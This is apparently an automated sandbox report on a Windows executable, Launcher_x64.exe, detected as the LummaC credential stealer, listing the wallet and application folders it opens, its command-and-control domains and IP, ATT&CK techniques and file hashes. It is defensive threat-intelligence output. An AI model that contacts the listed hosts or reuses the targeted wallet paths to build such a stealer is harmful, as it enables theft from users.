Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior

Source: Yara match

File source: Process Memory Space: Launcher_x64.exe PID: 7372, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Launcher_x64.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Launcher_x64.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://undesirabkel.click/f?	100%	Avira URL Cloud	malware
undesirabkel.click	100%	Avira URL Cloud	malware
https://undesirabkel.click/apis0	100%	Avira URL Cloud	malware
https://undesirabkel.click/.?	100%	Avira URL Cloud	malware
https://undesirabkel.click:443/api	100%	Avira URL Cloud	malware
https://undesirabkel.click/((j	100%	Avira URL Cloud	malware
https://undesirabkel.click/A	100%	Avira URL Cloud	malware
https://undesirabkel.click/api	100%	Avira URL Cloud	malware
https://undesirabkel.click/	100%	Avira URL Cloud	malware
https://undesirabkel.click/apite	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiH	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiw	100%	Avira URL Cloud	malware
https://undesirabkel.click/4	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
undesirabkel.click	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
undesirabkel.click	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://undesirabkel.click/api	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://undesirabkel.click/apis0	Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/f?	Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/A	Launcher_x64.exe, 00000003.00000002.2902244222.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/apite	Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/	Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1749472584.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969150771.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858070842.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1792574881.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/.?	Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/((j	Launcher_x64.exe, 00000003.00000003.1749740558.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750224448.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750974693.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750055715.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click:443/api	Launcher_x64.exe, 00000003.00000003.1736528894.0000000005716000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.0000000003005000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apiH	Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Launcher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/apiw	Launcher_x64.exe, 00000003.00000002.2902316169.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969092084.000000000300E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Launcher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Launcher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/4	Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	undesirabkel.click	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582871
Start date and time:	2024-12-31 17:36:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Launcher_x64.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/0@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 15 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Launcher_x64.exe, PID 7364 because there are no executed function
Execution Graph export aborted for target Launcher_x64.exe, PID 7372 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Launcher_x64.exe

Simulations

Behavior and APIs

Time	Type	Description
11:37:10	API Interceptor	8x Sleep call for process: Launcher_x64.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
undesirabkel.click	6QLvb9i.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.52.90
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	104.21.24.64
	over.ps1	Get hash	malicious	Vidar	Browse	172.64.41.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	172.67.217.81
	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse	104.16.79.73
	http://knoxoms.com	Get hash	malicious	Unknown	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Delta.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	188.114.97.3
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	PO#5_tower_Dec162024.cmd	Get hash	malicious	DBatLoader	Browse	188.114.97.3
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.8238522969039845
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Launcher_x64.exe
File size:	825'856 bytes
MD5:	741ee77540764d0c3eab3f6fa16f5f37
SHA1:	89db0aca9e9db4cec292b77c9592e8f10626ed11
SHA256:	fdfa752ff15ceefd4337704a2f52116dc44d18f7aa2ecb775ad0540dbc3990b2
SHA512:	a1a44c2c59d74bf6c5c0d89fc45f8e9e1d4482d6882a8e6d02713dbbb9e346d7bd73289dfb9ddb682c3e91ac7b62153c66ac1799b81c54458a46f9b0f1115c3f
SSDEEP:	12288:T3K1Pp+lMeB8fZ3/B+KI5sl+AAdd0tXQjZ3/B+KI5sl+AAdd0tXQJ:bK1PSMZRPB+A+AKdUgFPB+A+AKdUgJ
TLSH:	43050152B5D1C073D973267254F4EBBA483EF5201B229ADF1BD80B6E8F306D15A31B29
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a2e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	019ac8c6e24f80fb88de699b6749f599

Entrypoint Preview

Instruction
call 00007FC5B4B06D5Ah
